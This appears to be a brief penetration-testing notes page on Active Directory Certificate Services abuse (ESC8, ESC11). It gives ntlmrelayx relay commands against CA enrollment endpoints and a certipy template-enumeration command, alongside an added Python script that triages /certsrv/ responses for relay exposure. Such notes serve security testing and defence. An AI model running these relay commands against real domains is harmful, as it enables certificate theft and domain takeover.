ADCS
Certified Pre-Owned
ESC 8
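The relay target in this section is the CA's web-enrollment endpoint (`/certsrv/`) reached over HTTP with NTLM authentication. As an added defender-side example (not part of the original page or of any tool named here), the following classifies captured unauthenticated responses from `/certsrv/` URLs by whether that precondition is present; the host names, sample responses and function names are constructed for illustration.

```python
# Added example (not from the original page): triage AD CS web-enrollment
# responses for the NTLM-relay precondition behind ESC8. Hosts are constructed.
from urllib.parse import urlsplit

RELAYABLE = {"ntlm", "negotiate"}  # Negotiate can fall back to NTLM


def offered_schemes(headers):
    """Collect auth scheme names from every WWW-Authenticate header."""
    schemes = set()
    for name, value in headers:
        if name.lower() != "www-authenticate":
            continue
        # One header may carry several comma-separated challenges.
        for challenge in value.split(","):
            token = challenge.strip().split(" ", 1)[0].lower()
            if token:
                schemes.add(token)
    return schemes


def assess_certsrv(url, status, headers):
    """Classify one unauthenticated response from a /certsrv/ URL."""
    if status != 401 or not (offered_schemes(headers) & RELAYABLE):
        return "no-ntlm-challenge"
    if urlsplit(url).scheme.lower() == "http":
        # No TLS channel, so Extended Protection (EPA) cannot bind the auth.
        return "exposed"
    # HTTPS only blocks relay when EPA is set to Required on the IIS app.
    return "verify-epa-required"


# Constructed sample responses: (url, status, headers)
SAMPLES = [
    ("http://ca01.lab.example/certsrv/", 401,
     [("WWW-Authenticate", "Negotiate"), ("WWW-Authenticate", "NTLM")]),
    ("https://ca02.lab.example/certsrv/", 401,
     [("WWW-Authenticate", "Negotiate, NTLM")]),
    ("https://ca03.lab.example/certsrv/", 403, []),
]


def audit(samples):
    """Return {url: verdict} for a batch of captured responses."""
    return {url: assess_certsrv(url, status, hdrs) for url, status, hdrs in samples}


if __name__ == "__main__":
    for url, verdict in audit(SAMPLES).items():
        print(f"{verdict:22} {url}")
```

A verdict of `verify-epa-required` cannot be resolved from headers alone; it has to be confirmed against the IIS Extended Protection setting on the CA.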
```powershell
ntlmrelayx.py -t http://<ca-name>/certsrv/ -smb2support --adcs --template <VULN-TEMPLATE-NAME>
```
ESC 11
```powershell
ntlmrelayx.py -t rpc://ca.domain.local --template <Template-Name> -rpc-mode ICPR -icpr-ca-name <CA-NAME> -smb2support -debug
```
certipy
Enumerate certificate templates in an Active Directory environment.
Flags are:
- -u username@domain
- -p password
- -dc-ip Domain Controller IP address
- -enabled only shows enabled templates
- -hide-admins Don't show administrator permissions
```
certipy find \
  -u 'attacker@lab.internal' -p 'Passw0rd!' \
  -dc-ip '10.0.0.100' -text \
  -enabled -hide-admins
```
certify
TODO